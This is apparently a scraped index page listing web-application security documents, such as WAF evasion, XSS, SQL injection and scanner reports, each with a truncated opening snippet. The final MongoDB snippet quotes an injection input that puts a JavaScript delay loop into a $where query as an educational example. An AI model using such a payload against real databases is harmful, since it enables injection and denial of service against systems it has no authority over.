Web Application Firewall Profiling and Evasion Michael Ritter Cyber Risk Services Deloitte Content 1. Introduction 2. WAF Basics 3. Identifying a WAF 4. WAF detection tools 5. WAF bypassing methods 6.
More informationApplication Layer Encryption: Protecting against Application Logic and Session Theft Attacks. Whitepaper
Application Layer Encryption: Protecting against Application Logic and Session Theft Attacks Whitepaper The security industry has extensively focused on protecting against malicious injection attacks like
More informationDFW INTERNATIONAL AIRPORT STANDARD OPERATING PROCEDURE (SOP)
Title: Functional Category: Information Technology Services Issuing Department: Information Technology Services Code Number: xx.xxx.xx Effective Date: xx/xx/2014 1.0 PURPOSE 1.1 To appropriately manage
More informationWeb Intrusion Detection with ModSecurity. Ivan Ristic <ivanr@webkreator.com>
Web Intrusion Detection with ModSecurity Ivan Ristic Aim of This Talk Discuss the state of Web Intrusion Detection Introduce ModSecurity Introduce an open source web application
More informationSQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova
SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova Where someone is building a Web application, often he need to use databases to store information, or to manage user accounts. And
More informationKenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data
Kenna Platform Security A technical overview of the comprehensive security measures Kenna uses to protect your data V2.0, JULY 2015 Multiple Layers of Protection Overview Password Salted-Hash Thank you
More informationSANDCAT THE WEB APPLICATION SECURITY ASSESSMENT SUITE WHAT IS SANDCAT? MAIN COMPONENTS. Web Application Security
SANDCAT WHAT IS SANDCAT? THE WEB APPLICATION SECURITY ASSESSMENT SUITE Sandcat is a hybrid multilanguage web application security assessment suite - a software suite that simulates web-based attacks. Sandcat
More informationWeb Application Security
Web Application Security Ng Wee Kai Senior Security Consultant PulseSecure Pte Ltd About PulseSecure IT Security Consulting Company Part of Consortium in IDA (T) 606 Term Tender Cover most of the IT Security
More informationBarracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper
Barracuda Web Application Firewall vs. Intrusion Prevention Systems (IPS) Whitepaper Securing Web Applications As hackers moved from attacking the network to attacking the deployed applications, a category
More informationApplication and Database Security with F5 BIG-IP ASM and IBM InfoSphere Guardium
Application and Database Security with F5 BIG-IP ASM and IBM InfoSphere Guardium Organizations need an end-to-end web application and database security solution to protect data, customers, and their businesses.
More informationAdobe Systems Incorporated
Adobe Connect 9.2 Page 1 of 8 Adobe Systems Incorporated Adobe Connect 9.2 Hosted Solution June 20 th 2014 Adobe Connect 9.2 Page 2 of 8 Table of Contents Engagement Overview... 3 About Connect 9.2...
More informationHow To Fix A Web Application Security Vulnerability
Proposal of Improving Web Application Security in Context of Latest Hacking Trends RADEK VALA, ROMAN JASEK Department of Informatics and Artificial Intelligence Tomas Bata University in Zlin, Faculty of
More information2009-12-26 PST_WEBZINE_0X04. How to solve XSS and mix user's HTML/JavaScript code with your content with just one script
ACS - Active Content Signatures By Eduardo Vela Nava ACS - Active Content Signatures How to solve XSS and mix user's HTML/JavaScript code with your content with just one script Eduardo Vela Nava (sirdarckcat@gmail.com)
More informationWeb Vulnerability Scanner by Using HTTP Method
Available Online at www.ijcsmc.com International Journal of Computer Science and Mobile Computing A Monthly Journal of Computer Science and Information Technology IJCSMC, Vol. 4, Issue. 9, September 2015,
More informationCross-Site Scripting
Cross-Site Scripting (XSS) Computer and Network Security Seminar Fabrice Bodmer (fabrice.bodmer@unifr.ch) UNIFR - Winter Semester 2006-2007 XSS: Table of contents What is Cross-Site Scripting (XSS)? Some
More informationSecurity Research Advisory IBM inotes 9 Active Content Filtering Bypass
Security Research Advisory IBM inotes 9 Active Content Filtering Bypass Table of Contents SUMMARY 3 VULNERABILITY DETAILS 3 TECHNICAL DETAILS 4 LEGAL NOTICES 7 Active Content Filtering Bypass Advisory
More informationOWASP Top Ten Tools and Tactics
OWASP Top Ten Tools and Tactics Russ McRee Copyright 2012 HolisticInfoSec.org SANSFIRE 2012 10 JULY Welcome Manager, Security Analytics for Microsoft Online Services Security & Compliance Writer (toolsmith),
More informationASL IT Security Advanced Web Exploitation Kung Fu V2.0
ASL IT Security Advanced Web Exploitation Kung Fu V2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: There is a lot more in modern day web exploitation than the good old alert( xss ) and union
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationPractical Exploitation Using A Malicious Service Set Identifier (SSID)
Practical Exploitation Using A Malicious Service Set Identifier (SSID) Deral Heiland Senior Security Engineer CDW Advanced Technology Services Mike Belton Technical Lead CDW Advanced Technology Services
More informationSecure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda
Secure Web Application Coding Team Introductory Meeting December 1, 2005 1:00 2:00PM Bits & Pieces Room, Sansom West Room 306 Agenda 1. Introductions for new members (5 minutes) 2. Name of group 3. Current
More informationFINAL DoIT 11.03.2015 - v.4 PAYMENT CARD INDUSTRY DATA SECURITY STANDARDS APPLICATION DEVELOPMENT AND MAINTENANCE PROCEDURES
Purpose: The Department of Information Technology (DoIT) is committed to developing secure applications. DoIT s System Development Methodology (SDM) and Application Development requirements ensure that
More informationCross Site Scripting (XSS) and PHP Security. Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011
Cross Site Scripting (XSS) and PHP Security Anthony Ferrara NYPHP and OWASP Security Series June 30, 2011 What Is Cross Site Scripting? Injecting Scripts Into Otherwise Benign and Trusted Browser Rendered
More informationThe Image that called me
The Image that called me Active Content Injection with SVG Files A presentation by Mario Heiderich, 2011 Introduction Mario Heiderich Researcher and PhD student at the Ruhr- University, Bochum Security
More informationWAFFle: Fingerprinting Filter Rules of Web Application Firewalls
Email: sebastian.schinzel@cs.fau.de Twitter: @seecurity WAFFle: Fingerprinting Filter Rules of Web Application Firewalls Isabell Schmitt, Sebastian Schinzel* Friedrich-Alexander Universität Erlangen-Nürnberg
More informationBug Report. Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca)
Bug Report Date: March 19, 2011 Reporter: Chris Jarabek (cjjarabe@ucalgary.ca) Software: Kimai Version: 0.9.1.1205 Website: http://www.kimai.org Description: Kimai is a web based time-tracking application.
More informationAdvanced XSS. Nicolas Golubovic
Advanced XSS Nicolas Golubovic Image courtesy of chanpipat / FreeDigitalPhotos.net Today's menu 1. Starter: reboiled XSS 2. Course: spicy blacklists & filters 3. Course: sweet content sniffing 4. Course:
More informationWeb application security
Web application security Sebastian Lopienski CERN Computer Security Team openlab and summer lectures 2010 (non-web question) Is this OK? int set_non_root_uid(int uid) { // making sure that uid is not 0
More informationWeb Application Firewalls: What the vendors do NOT want you to know. The OWASP Foundation http://www.owasp.org
Web Application Firewalls: What the vendors do NOT want you to know Sandro Gauci EnableSecurity sandro@enablesecurity.com nd Wendel G. Henrique Trustwave whenrique@trustwave.com Copyright The OWASP Foundation
More informationAnybody who has a Web presence understands that
Article ISSA Title Article The Author Global Voice of Information Security Evaluating the safety of your Web presence Web Application Testing By Brad C. Johnson There is inherent risk on the Internet the
More informationMatriXay WEB Application Vulnerability Scanner V 5.0. 1. Overview. (DAS- WEBScan ) - - - - - The best WEB application assessment tool
MatriXay DAS-WEBScan MatriXay WEB Application Vulnerability Scanner V 5.0 (DAS- WEBScan ) - - - - - The best WEB application assessment tool 1. Overview MatriXay DAS- Webscan is a specific application
More informationWeb Application Security
E-SPIN PROFESSIONAL BOOK Vulnerability Management Web Application Security ALL THE PRACTICAL KNOW HOW AND HOW TO RELATED TO THE SUBJECT MATTERS. COMBATING THE WEB VULNERABILITY THREAT Editor s Summary
More informationProject 2: Web Security Pitfalls
EECS 388 September 19, 2014 Intro to Computer Security Project 2: Web Security Pitfalls Project 2: Web Security Pitfalls This project is due on Thursday, October 9 at 6 p.m. and counts for 8% of your course
More informationExternal Network & Web Application Assessment. For The XXX Group LLC October 2012
External Network & Web Application Assessment For The XXX Group LLC October 2012 This report is solely for the use of client personal. No part of it may be circulated, quoted, or reproduced for distribution
More informationWeb Application Firewalls Evaluation and Analysis. University of Amsterdam System & Network Engineering MSc
Web Application Firewalls Evaluation and Analysis Andreas Karakannas Andreas.Karakanas@os3.nl George Thessalonikefs George.Thessalonikefs@os3.nl University of Amsterdam System & Network Engineering MSc
More informationAcunetix Website Audit. 5 November, 2014. Developer Report. Generated by Acunetix WVS Reporter (v8.0 Build 20120808)
Acunetix Website Audit 5 November, 2014 Developer Report Generated by Acunetix WVS Reporter (v8.0 Build 20120808) Scan of http://filesbi.go.id:80/ Scan details Scan information Starttime 05/11/2014 14:44:06
More informationNuclear Regulatory Commission Computer Security Office Computer Security Standard
Nuclear Regulatory Commission Computer Security Office Computer Security Standard Office Instruction: Office Instruction Title: CSO-STD-1108 Web Application Standard Revision Number: 1.0 Effective Date:
More informationWhat about MongoDB? can req.body.input 0; var date = new Date(); do {curdate = new Date();} while(curdate-date<10000)
Security What about MongoDB? Even though MongoDB doesn t use SQL, it can be vulnerable to injection attacks db.collection.find( {active: true, $where: function() { return obj.credits - obj.debits < req.body.input;
More information